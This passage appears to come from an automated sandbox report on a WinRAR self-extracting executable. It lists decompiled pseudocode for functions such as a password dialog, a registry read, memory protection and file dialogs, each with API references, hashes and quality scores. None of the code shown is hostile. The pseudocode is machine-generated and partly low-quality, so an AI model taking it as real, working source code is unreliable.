				_t47 = 0;
				_v8 = 0;
				if(_a4 <= 0) {
					return _t25;
				}
				_push(_t35);
				_push(_t48);
				do {
					if(_v8 >= 0x20) {
						if(_t47 < _a4) {
							L8:
							E00411C9C( &_v28);
							E0041C1ED( &_v28, 0x42d4c4);
							goto L9;
						}
						L12:
						return _t25;
					}
					_t48 = _a4 - _t47;
					_t41 = 0x20;
					_t42 = _t41 - _v8;
					_t30 = _t48;
					_t31 = _t30 / _t42;
					_t46 = _t30 % _t42;
					_v12 = _t31;
					if(_t31 <= 0x400000) {
						_v12 = 0x400000;
					}
					while(_t48 >= _v12) {
						_t35 = E0041C86E(_t35, _t46, _t47, _t48);
						if(_t35 != 0) {
							goto L9;
						}
						_t48 = _t48 - (_t48 >> 5);
					}
					goto L8;
					L9:
					E0041A110(_t47, _t35, 0, _t48);
					_t25 = _v16;
					_t40 = _v8 << 2;
					_t47 = _t47 + _t48;
					_t51 = _t51 + 0xc;
					_v8 = _v8 + 1;
					 *((intOrPtr*)(_t40 + _t25)) = _t35;
					 *((intOrPtr*)(_t40 + _t25 + 0x80)) = _t47;
				} while (_t47 < _a4);
				goto L12;
			}

0x00412086
0x00412089
0x0041208e
0x00412090
0x00412096
0x00412129
0x00412129
0x0041209c
0x0041209d
0x0041209e
0x004120a2
0x00412123
0x004120df
0x004120e2
0x004120f0
0x00000000
0x004120f0
0x00412125
0x00000000
0x00412126
0x004120a9
0x004120ab
0x004120ac
0x004120b1
0x004120b3
0x004120b3
0x004120ba
0x004120bf
0x004120c1
0x004120c1
0x004120da
0x004120cc
0x004120d1
0x00000000
0x00000000
0x004120d8
0x004120d8
0x00000000
0x004120f5
0x004120f9
0x00412101
0x00412104
0x00412107
0x00412109
0x0041210c
0x0041210f
0x00412112
0x00412119
0x00000000

APIs

__CxxThrowException@8.LIBCMT ref: 004120F0
_memset.LIBCMT ref: 004120F9

Strings

, xrefs: 0041209E

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw_memset
String ID:
API String ID: 3963884845-3916222277
Opcode ID: 23c77863f54dea36e42aa203406a9495c65b63d81274f5c45b21c8baf43a9ce6
Instruction ID: 04974210ab735fc59c2bda538a1f9f5e3a74f80f1bb2bf2d20185d07e8c93425
Opcode Fuzzy Hash: 23c77863f54dea36e42aa203406a9495c65b63d81274f5c45b21c8baf43a9ce6
Instruction Fuzzy Hash: AF11D671E00118BBCB14EF69CA816DEBB74FF58344F20416BE605E7241D6B86AD1C798

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB92, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040CB92(intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				void* _t7;
				long _t8;
				intOrPtr* _t19;
				void* _t20;
				void* _t27;
				signed int _t28;
				intOrPtr _t30;

				_t30 =  *0x437cc0; // 0x0
				if(_t30 == 0) {
					E0040CB53(0x437cb8);
				}
				_t28 = _a8;
				_t7 = _t28 - (_t28 & 0x0000000f);
				if(_a12 == 0) {
					_t19 =  *0x437cc4; // 0x0
					if(_t19 == 0) {
						goto L10;
					} else {
						_t8 =  *_t19(_a4, _t7, 0);
						if(_t8 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					_t19 =  *0x437cc0; // 0x0
					if(_t19 == 0) {
						L10:
						_t8 = GetCurrentProcessId();
						_t20 = 0;
						if(_t28 > 0) {
							_t27 = _t8 + 0x4b;
							do {
								_t8 = _a4 + _t20;
								 *_t8 =  *_t8 ^ _t27 + _t20;
								_t20 = _t20 + 1;
							} while (_t20 < _t28);
						}
					} else {
						_t8 =  *_t19(_a4, _t7, 0);
						if(_t8 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0x432a6c);
							E00422FB3(E0040634C(_t19));
							return E004062C3(0x432a6c, 2);
						}
					}
				}
				return _t8;
			}

0x0040cb99
0x0040cb9f
0x0040cba6
0x0040cba6
0x0040cbab
0x0040cbb5
0x0040cbba
0x0040cbf5
0x0040cbfd
0x00000000
0x0040cbff
0x0040cc04
0x0040cc08
0x0040cc0a
0x00000000
0x0040cc0a
0x0040cc08
0x0040cbbc
0x0040cbbc
0x0040cbc4
0x0040cc11
0x0040cc11
0x0040cc17
0x0040cc1b
0x0040cc1f
0x0040cc22
0x0040cc25
0x0040cc2b
0x0040cc2d
0x0040cc2e
0x0040cc22
0x0040cbc6
0x0040cbcb
0x0040cbcf
0x0040cbd1
0x0040cbd6
0x0040cbdb
0x0040cbe5
0x00000000
0x0040cbee
0x0040cbcf
0x0040cbc4
0x0040cc35

APIs

Part of subcall function 0040CB53: LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CBAB,00000020,?,?,00405D18,?,00000020,00000001,?,00000010,?,?,?,00000001), ref: 0040CB61
Part of subcall function 0040CB53: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CB7A
Part of subcall function 0040CB53: GetProcAddress.KERNEL32(00437CB8,CryptUnprotectMemory), ref: 0040CB86

GetCurrentProcessId.KERNEL32(00000020,?,?,00405D18,?,00000020,00000001,?,00000010,?,?,?,00000001,?,?,00000200), ref: 0040CC11

Strings

l*C, xrefs: 0040CBD6
CryptUnprotectMemory failed, xrefs: 0040CC0A
CryptProtectMemory failed, xrefs: 0040CBD1

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CurrentLibraryLoadProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed$l*C
API String ID: 137661620-2249010512
Opcode ID: 187812f755f33daf9fc4e17be7842717aa8a8db9bdc01febb0487ec019d35a9b
Instruction ID: a12aeaceeb6eb115413dcead53f1316f75b8b1c6aeecf4335876f9717977ea69
Opcode Fuzzy Hash: 187812f755f33daf9fc4e17be7842717aa8a8db9bdc01febb0487ec019d35a9b
Instruction Fuzzy Hash: E6112571348115AFEF28AB24ECD197E3715AB01764700813FF94AAB3C2DA3C9C42829D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D19C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040D19C(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* _t15;
				void* _t20;
				struct HWND__* _t33;

				_t33 = _a4;
				if(E00406056(__edx, _t33, _a8, _a12, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t15 = _a8 - 0x110;
				if(_t15 == 0) {
					SetDlgItemTextW(_t33, 0x66, _a16);
					goto L10;
				}
				if(_t15 != 1) {
					L5:
					return 0;
				}
				_t20 = (_a12 & 0x0000ffff) - 1;
				if(_t20 == 0) {
					GetDlgItemTextW(_t33, 0x65,  &_v260, 0x80);
					E0040CCBC(__ebx, 0x44c2d8,  &_v260);
					E0040CC38( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t33, ??);
					goto L10;
				}
				if(_t20 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0040d1a7
0x0040d1c4
0x0040d22f
0x00000000
0x0040d231
0x0040d1c9
0x0040d1ce
0x0040d229
0x00000000
0x0040d229
0x0040d1d1
0x0040d1dd
0x00000000
0x0040d1dd
0x0040d1d7
0x0040d1d8
0x0040d1fb
0x0040d20d
0x0040d21a
0x0040d21f
0x0040d1e2
0x0040d1e3
0x00000000
0x0040d1e3
0x0040d1db
0x0040d1e1
0x00000000
0x0040d1e1
0x00000000

APIs

EndDialog.USER32(?,00000001), ref: 0040D1E3
GetDlgItemTextW.USER32 ref: 0040D1FB
SetDlgItemTextW.USER32 ref: 0040D229

Strings

GETPASSWORD1, xrefs: 0040D1AE

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$Dialog
String ID: GETPASSWORD1
API String ID: 1770891597-3292211884
Opcode ID: d902355fa263a835f228a99bc991e445185317d1e83636d90262a1c1ae5171bd
Instruction ID: ad483bc0abb1a4790f075691b5c15221bfc53df1be929cc2fec6e024b760eb0a
Opcode Fuzzy Hash: d902355fa263a835f228a99bc991e445185317d1e83636d90262a1c1ae5171bd
Instruction Fuzzy Hash: 2411CE32900019BBDB21AF91AD44EFB3A6DEF59340F00007AB905F51C0DABDCA95967A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D803, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D803(void* __esi, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				void* _v12;
				int _v16;
				char _v4112;
				short _v8208;
				long _t22;
				signed int _t31;
				void* _t38;

				_t22 = E0041A3E0(0x200c);
				if( *0x440d30 != 0) {
					E0040D73C( &_v8208, _a4);
					_t22 = RegOpenKeyExW(0x80000001, L"Software\\WinRAR SFX", 0, 1,  &_v12);
					if(_t22 == 0) {
						_v8 = 0x1000;
						if(RegQueryValueExW(_v12,  &_v8208, 0,  &_v16,  &_v4112,  &_v8) == 0) {
							_v8 = _v8 >> 1;
							_t31 = 0x7ff;
							if(_v8 < 0x7ff) {
								_t31 = _v8;
							}
							 *((short*)(_t38 + _t31 * 2 - 0x100c)) = 0;
							E0041078F(_a4,  &_v4112, _a8);
						}
						return RegCloseKey(_v12);
					}
				}
				return _t22;
			}

0x0040d80b
0x0040d817
0x0040d827
0x0040d83e
0x0040d847
0x0040d864
0x0040d873
0x0040d875
0x0040d878
0x0040d880
0x0040d882
0x0040d882
0x0040d88a
0x0040d89c
0x0040d89c
0x00000000
0x0040d8a4
0x0040d847
0x0040d8ab

APIs

Part of subcall function 0040D73C: _wcscpy.LIBCMT ref: 0040D741

RegOpenKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000001,?,?), ref: 0040D83E
RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0040D86B
RegCloseKey.ADVAPI32(?), ref: 0040D8A4

Strings

Software\WinRAR SFX, xrefs: 0040D834

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue_wcscpy
String ID: Software\WinRAR SFX
API String ID: 2005349754-754673328
Opcode ID: 37d018c4f78fbb3e1f6f2b9f5d6c5861ff49f307876e4b8d4471ed0d78bdbba1
Instruction ID: 5a9193356041486af7d88c0ffeaa0dda918f4ea3a0adc7512a334462e465b1a1
Opcode Fuzzy Hash: 37d018c4f78fbb3e1f6f2b9f5d6c5861ff49f307876e4b8d4471ed0d78bdbba1
Instruction Fuzzy Hash: 5F114C36900208FBEF21AF94DD44FDD7B78EF04344F0080B6B905A2190D7789A94DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00405088, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00405095
SHBrowseForFolderW.SHELL32(?), ref: 004050D0

Strings

A, xrefs: 004050C9

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderMalloc
String ID: A
API String ID: 3812826013-3554254475
Opcode ID: af3df2ad0e8bdd6d153590c5d4b8df7a33f19717e083d44900a5914605728333
Instruction ID: 837e74b3ba3e417de6b8f71e13f8f261a4f65ddfbc7cd26342cbc7cb0986ed9c
Opcode Fuzzy Hash: af3df2ad0e8bdd6d153590c5d4b8df7a33f19717e083d44900a5914605728333
Instruction Fuzzy Hash: 90010572900619EBCB10CFA4D909BEF7BF8EF49351F1045A6E801E7240DB79DA059FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3FA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E3FA(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				WCHAR* _t16;
				int _t19;
				_Unknown_base(*)()* _t25;

				 *0x440ce0 = _a12;
				 *0x440ce4 = _a16;
				 *0x440cd8 = _a20;
				if( *0x440cde == 0) {
					if( *0x440cdf == 0) {
						_t25 = E0040DB4B;
						_t16 = L"REPLACEFILEDLG";
						while(1) {
							_t19 = DialogBoxParamW( *0x432a64, _t16,  *0x440cf8, _t25, _a4);
							if(_t19 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x432a68, L"RENAMEDLG",  *0x440cf4, E0040D113, _v0) != 0) {
								break;
							}
						}
						return _t19;
					}
					return 1;
				}
				return 0;
			}

0x0040e405
0x0040e40e
0x0040e417
0x0040e41c
0x0040e429
0x0040e43a
0x0040e43f
0x0040e466
0x0040e47a
0x0040e47f
0x00000000
0x00000000
0x0040e464
0x00000000
0x00000000
0x0040e464
0x00000000
0x0040e486
0x00000000
0x0040e42d
0x00000000

Strings

RENAMEDLG, xrefs: 0040E455
REPLACEFILEDLG, xrefs: 0040E43F, 0040E471

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: cb22c0ae4033b6244ff3c600970fd6d74cbf704c2ba583c2d88d1c1f7928967c
Instruction ID: 3e253d603107cfd7b84a43a4e125ce07cedbc4b4f1912872026335e8a18716fa
Opcode Fuzzy Hash: cb22c0ae4033b6244ff3c600970fd6d74cbf704c2ba583c2d88d1c1f7928967c
Instruction Fuzzy Hash: 9401B535604205EFD714DB65ED80A167B98E74A380F140937FE01E22A0C7359C369B2E

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB32, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0041DB32(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0041DAA0(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00419A26(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0041D51D(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0041D785(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E004199ED(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x0041db32
0x0041db32
0x0041db32
0x0041db32
0x0041db32
0x0041db37
0x0041db3b
0x0041db3d
0x0041db40
0x0041db41
0x0041db42
0x0041db45
0x0041db4a
0x0041db4a
0x0041db4d
0x0041db51
0x0041db54
0x0041db59
0x0041db56
0x0041db56
0x0041db56
0x0041db5c
0x0041db61
0x0041db63
0x0041db66
0x0041db69
0x0041db6a
0x0041db72
0x0041db77
0x0041db7b
0x0041db7e
0x0041db81
0x0041db87
0x0041db88
0x0041db8b
0x0041db95
0x0041db99
0x00000000
0x0041db99
0x0041db9f

APIs

___BuildCatchObject.LIBCMT ref: 0041DB45

Part of subcall function 0041DAA0: ___BuildCatchObjectHelper.LIBCMT ref: 0041DAD6

_UnwindNestedFrames.LIBCMT ref: 0041DB5C
___FrameUnwindToState.LIBCMT ref: 0041DB6A

Strings

csm, xrefs: 0041DB41, 0041DB56, 0041DB69, 0041DB87, 0041DB97

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 79e1ba1210b6e2ae92a943d7b382d0d9c3a326dcd833803b9389be224f4f19e6
Instruction ID: 09341b3a9efbefc37d0f44c5f47c0f22f8a325506bd1cc82f4c98b133d4d6bcd
Opcode Fuzzy Hash: 79e1ba1210b6e2ae92a943d7b382d0d9c3a326dcd833803b9389be224f4f19e6
Instruction Fuzzy Hash: C001FBB1801149BBDF12AF52CC45EEB7F6AEF08398F004016FD1915161D73AE9B1DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD93, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040BD93(intOrPtr* __ecx) {
				char _v2052;
				struct HINSTANCE__* _t5;
				struct HRSRC__* _t6;
				signed int _t10;
				char _t12;
				intOrPtr* _t18;

				_t18 = __ecx;
				_t5 = GetModuleHandleW(0);
				_t19 = L"RTL";
				_t6 = FindResourceW(_t5, L"RTL", 5);
				if(_t6 == 0) {
					E0040BBC2(_t18, L"LTR",  &_v2052, 0x400, 1, L"LTR");
					_t10 = E0041A311( &_v2052, _t19);
					asm("sbb al, al");
					_t12 =  ~_t10 + 1;
					 *((char*)(_t18 + 0x10)) = _t12;
					return _t12;
				}
				 *((char*)(_t18 + 0x10)) = 1;
				return _t6;
			}

0x0040bda0
0x0040bda2
0x0040bdaa
0x0040bdb1
0x0040bdb9
0x0040bdd8
0x0040bde5
0x0040bdec
0x0040bdef
0x0040bdf2
0x00000000
0x0040bdf2
0x0040bdbb
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0040BDA2
FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0040BDB1

Strings

LTR, xrefs: 0040BDC1, 0040BDC6, 0040BDD5
RTL, xrefs: 0040BDAA, 0040BDAF, 0040BDE3

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FindHandleModuleResource
String ID: LTR$RTL
API String ID: 3537982541-719208805
Opcode ID: 2bac27298548910c9cbb81b8b4dd1892efb71e3e927b4052bb4b9a5e088500f5
Instruction ID: 277ce3cca7ec8487b7d160128f6f1ba8bf4f44b8bd910c2a75bc3ff6af2643bd
Opcode Fuzzy Hash: 2bac27298548910c9cbb81b8b4dd1892efb71e3e927b4052bb4b9a5e088500f5
Instruction Fuzzy Hash: 46F0B42134422467D7246A766C0AFE73B6CFB41714F44057ABA05E61C1CFA8D45A87EE

Uniqueness

Uniqueness Score: -1.00%

Function 00422F3A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00422F3A() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x42b930;
					_v28 =  *0x42b928;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00422f3f
0x00422f47
0x00422f5e
0x00422f0a
0x00422f13
0x00422f1f
0x00422f22
0x00422f25
0x00422f27
0x00422f2a
0x00422f2f
0x00422f39
0x00422f31
0x00422f35
0x00422f35
0x00422f49
0x00422f4f
0x00422f57
0x00000000
0x00422f59
0x00422f59
0x00422f5d
0x00422f5d
0x00422f57

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0041D260), ref: 00422F3F
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00422F4F

Strings

IsProcessorFeaturePresent, xrefs: 00422F49
KERNEL32, xrefs: 00422F3A

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: a159929c238ffb177809fcae6844906b7b06d1900f5dbd57b054acac30aef6aa
Instruction ID: ccff8dba21539ae15aa371e257bf0cb1237496308eea27bb5258e634e234555a
Opcode Fuzzy Hash: a159929c238ffb177809fcae6844906b7b06d1900f5dbd57b054acac30aef6aa
Instruction Fuzzy Hash: 99F01260B0061EA2DB101BA1BE4966F7B75FB80751FD20591D695B0094DF7580B6928E

Uniqueness

Uniqueness Score: -1.00%

Function 004194DB, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004194DB(intOrPtr* __ecx, intOrPtr _a4) {
				struct _WNDCLASSEXW _v52;
				short _t17;
				intOrPtr* _t18;
				intOrPtr _t21;

				_t21 = _a4;
				_t18 = __ecx;
				_v52.cbSize = 0x30;
				_v52.style = 0x828;
				_v52.lpfnWndProc = E00419491;
				_v52.cbClsExtra = 0;
				_v52.cbWndExtra = 0;
				_v52.hInstance = _t21;
				_v52.hIcon = 0;
				_v52.hCursor = LoadCursorW(0, 0x7f00);
				_v52.hbrBackground = 6;
				_v52.lpszMenuName = 0;
				_v52.lpszClassName = L"RarHtmlClassName";
				_v52.hIconSm = 0;
				_t17 = RegisterClassExW( &_v52);
				 *_t18 = _t21;
				return _t17;
			}

0x004194e3
0x004194ef
0x004194f1
0x004194f8
0x004194ff
0x00419506
0x00419509
0x0041950c
0x0041950f
0x00419518
0x0041951f
0x00419526
0x00419529
0x00419530
0x00419533
0x0041953a
0x0041953f

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 00419512
RegisterClassExW.USER32 ref: 00419533

Strings

RarHtmlClassName, xrefs: 00419529
0, xrefs: 004194F1

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$RarHtmlClassName
API String ID: 1693014935-3342523147
Opcode ID: d052972254cc8ddf88e1cc35d03acc19ff0de4ba7d76020e5acf806cdabd8ad3
Instruction ID: 0405871a39690185c9db23ac8502d1b0fc1ad774c36277712f880496637f08f4
Opcode Fuzzy Hash: d052972254cc8ddf88e1cc35d03acc19ff0de4ba7d76020e5acf806cdabd8ad3
Instruction Fuzzy Hash: 2BF0F6B1D01228ABCB018F89D844ADEFBF8FF58304F10805BE500B6250C7B516018FA9

Uniqueness

Uniqueness Score: -1.00%

Function 00410C7D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00410C7D(void* __ecx, void* __edx, void* __edi) {
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t9;
				void* _t10;
				long* _t14;
				void* _t15;
				void* _t20;

				_t15 = __edx;
				E00419DD4(E0042932A, _t20);
				_push(__ecx);
				EnterCriticalSection(0x44ea50);
				_t6 =  *0x44ea48; // 0x0
				 *0x44ea48 =  *0x44ea48 + 1;
				_t23 = _t6;
				if(_t6 == 0) {
					_push(0x1b8);
					_t14 = E0041A18A(_t10, _t15, __edi, _t23);
					 *((intOrPtr*)(_t20 - 0x10)) = _t14;
					_t9 = 0;
					 *((intOrPtr*)(_t20 - 4)) = 0;
					if(_t14 != 0) {
						_t9 = E00410B34(_t14, 0x20);
					}
					 *0x44ea44 = _t9;
				}
				LeaveCriticalSection(0x44ea50);
				_t7 =  *0x44ea44; // 0x2251238
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0xc));
				return _t7;
			}

0x00410c7d
0x00410c82
0x00410c87
0x00410c8f
0x00410c95
0x00410c9a
0x00410ca0
0x00410ca2
0x00410ca4
0x00410caf
0x00410cb1
0x00410cb4
0x00410cb6
0x00410cbb
0x00410cbf
0x00410cbf
0x00410cc4
0x00410cc4
0x00410cca
0x00410cd3
0x00410cd9
0x00410ce1

APIs

__EH_prolog.LIBCMT ref: 00410C82
EnterCriticalSection.KERNEL32(0044EA50,?,?,0040966E,?,00000000,?,0040B6EF,?,00000000), ref: 00410C8F
LeaveCriticalSection.KERNEL32(0044EA50,?,0040966E,?,00000000,?,0040B6EF,?,00000000), ref: 00410CCA

Part of subcall function 0041A18A: _malloc.LIBCMT ref: 0041A1A4

Part of subcall function 00410B34: InitializeCriticalSection.KERNEL32(000001A0,?,0044EA50,?,00410CC4,00000020,?,0040966E,?,00000000,?,0040B6EF,?,00000000), ref: 00410B6D
Part of subcall function 00410B34: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0040966E,?,00000000,?,0040B6EF,?,00000000), ref: 00410B77
Part of subcall function 00410B34: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0040966E,?,00000000,?,0040B6EF,?,00000000), ref: 00410B89

Strings

PD, xrefs: 00410C89

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

